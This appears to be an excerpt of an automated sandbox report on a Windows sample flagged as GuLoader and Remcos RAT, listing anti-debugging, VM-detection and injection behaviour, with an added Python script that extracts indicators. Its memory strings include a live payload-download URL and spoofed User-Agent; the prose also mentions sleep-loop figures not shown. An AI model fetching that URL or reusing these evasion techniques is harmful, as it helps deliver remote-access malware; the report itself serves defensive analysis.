Source: LzbZ4T1iV8.exe, 0000000D.00000002.1716793566.0000000000670000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=http://101.99.94.119/WEALTH_PRUuqVZw139.binwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: LzbZ4T1iV8.exe, 00000001.00000002.862725777.0000000002100000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: LzbZ4T1iV8.exe, 00000001.00000002.862725777.0000000002100000.00000004.00000001.sdmp, LzbZ4T1iV8.exe, 0000000D.00000002.1716793566.0000000000670000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe System information queried: ModuleInformation Jump to behavior
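The sleep-loop figures and the memory-string hits above can be turned into a small triage record with the script below. It is an added example, not tooling from the sandbox or from the sample; its inputs are copied from the report lines above, and everything else is the author's assumption: the VM-agent names beyond the two this sample looks for, and the rule that a URL ends at the first payload-looking extension, which is needed only because the memory strings are printed back to back with no separator.

```python
"""Triage helper for the evasion evidence in an automated sandbox report.

Added example for this page, not the sandbox's code.  The inputs below are
copied from the report lines above; the VM-agent list and the URL-boundary
heuristic are assumptions and are marked where they appear.
"""
import re

# Constructed input: the sleep-loop signature line as printed in the report.
SLEEP_LINE = "Thread sleep count: Count: 9146 delay: -5"

# Constructed input: the memory-string hit that carries the VM checks and the
# download URL.  The strings are concatenated with no separator, which is why
# the parsers below have to guess where each one ends.
MEM_BLOB = (r"ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exe"
            r"C:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32"
            r"TEMP=http://101.99.94.119/WEALTH_PRUuqVZw139.binwininet.dll"
            "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko")

# Threshold the report itself applies (it prints "... >= -30000s"); same unit
# as the report's own figures.
SLEEP_THRESHOLD = 30000

# Assumption: guest-agent binaries whose presence a loader reads as "I am in a
# VM".  The first two are the ones this sample checks; the others are common
# additions and are not taken from the report.
VM_AGENT_NAMES = {"qemu-ga.exe", "qga.exe", "vmtoolsd.exe", "vboxservice.exe"}

_SLEEP_RE = re.compile(r"Count:\s*(\d+)\s+delay:\s*(-?\d+)")
_PATH_RE = re.compile(r"[A-Za-z]:\\(?:[^:\\]+\\)*[^:\\]*?\.exe", re.IGNORECASE)
# Assumption: the URL ends at the first plausible payload extension, because the
# blob offers no other boundary ("...139.binwininet.dll").  Confirm against the PCAP.
_URL_RE = re.compile(r"https?://[^\s]+?\.(?:bin|exe|dll|dat|txt)", re.IGNORECASE)
_UA_RE = re.compile(r"Mozilla/\S+ \([^)]*\)(?: like Gecko)?")


def sleep_loop(line):
    """Reconstruct the loop's total delay from its count and per-call delay.

    The report prints the delay as a negative number (NtDelayExecution takes a
    relative interval as a negative value); only the magnitude matters here.
    """
    m = _SLEEP_RE.search(line)
    if not m:
        raise ValueError("not a sleep-loop signature line")
    count, delay = int(m.group(1)), abs(int(m.group(2)))
    total = count * delay
    return {"count": count, "delay": delay, "total": total,
            "evasive": total >= SLEEP_THRESHOLD}


def vm_artifacts(blob):
    """Every Windows path in the blob whose basename is a known VM agent."""
    hits = []
    for path in _PATH_RE.findall(blob):
        if path.rsplit("\\", 1)[-1].lower() in VM_AGENT_NAMES:
            hits.append(path)
    return hits


def network_iocs(blob):
    """Pull the download URL, its host and the spoofed browser User-Agent."""
    url = _URL_RE.search(blob)
    ua = _UA_RE.search(blob)
    return {"url": url.group(0) if url else None,
            "host": url.group(0).split("/")[2] if url else None,
            "user_agent": ua.group(0) if ua else None}


def triage(sleep_line=SLEEP_LINE, blob=MEM_BLOB):
    """Combine the three extractions into one record for the case notes."""
    return {"sleep": sleep_loop(sleep_line),
            "vm_artifacts": vm_artifacts(blob),
            "network": network_iocs(blob)}


if __name__ == "__main__":
    import json
    print(json.dumps(triage(), indent=2))
```

The product 9146 × 5 = 45730 matches the sleep-time figure the report prints against its 30000 threshold, so the loop alone exceeds the budget the report applies. Anything pulled out of the concatenated strings, the URL in particular, should be checked against the captured traffic before it goes into a blocklist.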

Anti Debugging:

Hides threads from debuggers
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Thread information set: HideFromDebugger Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F8680 rdtsc 1_2_020F8680
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F6562 LdrInitializeThunk, 1_2_020F6562
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F8680 mov eax, dword ptr fs:[00000030h] 1_2_020F8680
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F5461 mov eax, dword ptr fs:[00000030h] 1_2_020F5461
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F78E2 mov eax, dword ptr fs:[00000030h] 1_2_020F78E2
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F2CF2 mov eax, dword ptr fs:[00000030h] 1_2_020F2CF2
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F735B mov eax, dword ptr fs:[00000030h] 1_2_020F735B
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_020F37D8 mov eax, dword ptr fs:[00000030h] 1_2_020F37D8

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Process created: C:\Users\user\Desktop\LzbZ4T1iV8.exe 'C:\Users\user\Desktop\LzbZ4T1iV8.exe' Jump to behavior
Source: LzbZ4T1iV8.exe, 0000000D.00000002.1717238543.0000000000E80000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: LzbZ4T1iV8.exe, 0000000D.00000002.1717238543.0000000000E80000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: LzbZ4T1iV8.exe, 0000000D.00000002.1717238543.0000000000E80000.00000002.00000001.sdmp Binary or memory string: Progman
Source: logs.dat.13.dr Binary or memory string: [ Program Manager ]
Source: LzbZ4T1iV8.exe, 0000000D.00000002.1717238543.0000000000E80000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe Code function: 1_2_00401A45 cpuid 1_2_00401A45

Stealing of Sensitive Information:

GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior
Yara detected Remcos RAT
Source: Yara match File source: 0000000D.00000002.1716863368.00000000006E7000.00000004.00000020.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Remcos RAT
Source: Yara match File source: 0000000D.00000002.1716863368.00000000006E7000.00000004.00000020.sdmp, type: MEMORY